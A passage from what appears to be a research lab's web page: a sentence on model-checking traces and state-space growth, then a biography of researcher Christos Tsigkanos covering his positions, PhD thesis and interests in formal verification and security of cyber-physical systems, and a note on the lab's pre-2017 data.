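The returned trace doubles as an explanation of the violation, which is what a designer (or a runtime adaptation mechanism) would need to act on; realistic spaces need symbolic or more compact models because the joint state space grows exponentially with the number of agents.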

Christos Tsigkanos is a university assistant at the Technical University of Vienna. Previously, he was a post-doctoral researcher at Politecnico di Milano, Italy, where he received his PhD (2017) defending a thesis entitled “Modelling and Verification of Evolving Cyber-Physical Spaces” (advisor: Prof. Carlo Ghezzi). His research interests lie at the intersection of dependable systems and formal aspects of software engineering, and include security and privacy in distributed, self-adaptive and cyber-physical systems, requirements engineering, and formal verification.

Note: Data before 2017 may refer to grandparented work conducted by BALab's members at its progenitor laboratory, ISTLab.

Yearly Report 2019